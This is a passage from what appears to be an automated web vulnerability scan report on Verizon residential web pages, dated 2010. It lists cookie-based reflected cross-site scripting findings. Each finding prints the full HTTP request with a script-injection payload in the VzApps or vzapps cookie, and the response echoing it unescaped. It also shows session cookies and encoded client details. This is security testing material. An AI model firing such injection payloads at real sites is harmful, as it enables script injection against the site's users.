UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX6487d'><script>alert(1)</script>b45a269dda5; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57967
Expires: Sat, 20 Nov 2010 03:14:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6487d'><script>alert(1)</script>b45a269dda5; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6487D'><SCRIPT>ALERT(1)</SCRIPT>B45A269DDA5 ' />
...[SNIP]...

1.97. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5315'><script>alert(1)</script>2c1f456c2c6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf5315'><script>alert(1)</script>2c1f456c2c6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 03:14:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf5315'><script>alert(1)</script>2c1f456c2c6; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF5315'><SCRIPT>ALERT(1)</SCRIPT>2C1F456C2C6 ' />
...[SNIP]...

1.98. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86aaa<script>alert(1)</script>b944052706a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX86aaa<script>alert(1)</script>b944052706a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57997
Expires: Sat, 20 Nov 2010 03:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX86aaa<script>alert(1)</script>b944052706a; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86AAA<SCRIPT>ALERT(1)</SCRIPT>B944052706A </DIV>
...[SNIP]...

1.99. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0ce9'><script>alert(1)</script>6ae6011d9f2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 00:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE0CE9'><SCRIPT>ALERT(1)</SCRIPT>6AE6011D9F2 ' />
...[SNIP]...

1.100. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1afe5<script>alert(1)</script>103649a90a9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1afe5<script>alert(1)</script>103649a90a9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57996
Expires: Sat, 20 Nov 2010 00:09:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1afe5<script>alert(1)</script>103649a90a9; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1AFE5<SCRIPT>ALERT(1)</SCRIPT>103649A90A9 </DIV>
...[SNIP]...

1.101. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Overview/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b2139'><script>alert(1)</script>7fec920e9cc was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Overview/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXb2139'><script>alert(1)</script>7fec920e9cc; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71925
Expires: Sat, 20 Nov 2010 03:23:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXb2139'><script>alert(1)</script>7fec920e9cc; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB2139'><SCRIPT>ALERT(1)</SCRIPT>7FEC920E9CC ' />
...[SNIP]...

1.102. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Overview/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 766fa<script>alert(1)</script>a298fe0ec53 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

